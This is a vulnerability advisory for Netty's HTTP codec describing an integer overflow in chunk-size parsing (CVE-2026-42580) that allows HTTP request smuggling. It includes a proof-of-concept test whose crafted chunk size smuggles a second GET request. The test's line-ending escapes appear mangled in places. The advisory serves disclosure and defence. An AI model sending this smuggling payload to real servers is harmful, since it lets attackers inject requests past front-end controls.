PT-2026-38373 · Maven · Io.Netty:Netty-Codec-Http
Published
2026-05-07
·
Updated
2026-05-07
·
CVE-2026-42580
CVSS v3.1
6.5
Medium
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L |
Summary
Netty's chunk size parser silently overflows int, enabling request smuggling attacks.
Details
io.netty.handler.codec.http.HttpObjectDecoder#getChunkSize silently overflows int.
The size is accumulated as follows:
result *= 16;
result += digit;
The result is checked only for negative values. However, with a carefully crafted chunk size, the result can be a valid size.
PoC
The test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a chunked body.
@Test
public void test() {
String requestStr = "POST / HTTP/1.1r
" +
"Host: localhostr
" +
"Transfer-Encoding: chunkedr
r
" +
"100000004r
" +
"testr
" +
"0r
" +
"r
" +
"GET /smuggled HTTP/1.1r
" +
"Host: localhostr
" +
"Content-Length: 0r
" +
"r
";
EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US ASCII)));
// Request 1
HttpRequest request = channel.readInbound();
assertTrue(request.decoderResult().isSuccess());
HttpContent content = channel.readInbound();
assertTrue(content.decoderResult().isSuccess());
assertEquals("test", content.content().toString(CharsetUtil.US ASCII));
content.release();
LastHttpContent last = channel.readInbound();
assertTrue(last.decoderResult().isSuccess());
last.release();
// Request 2
request = channel.readInbound();
assertTrue(request.decoderResult().isSuccess());
last = channel.readInbound();
assertTrue(last.decoderResult().isSuccess());
last.release();
}Impact
HTTP Request Smuggling: Attacker injects arbitrary HTTP requests
Fix
HTTP Request/Response Smuggling
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Io.Netty:Netty-Codec-Http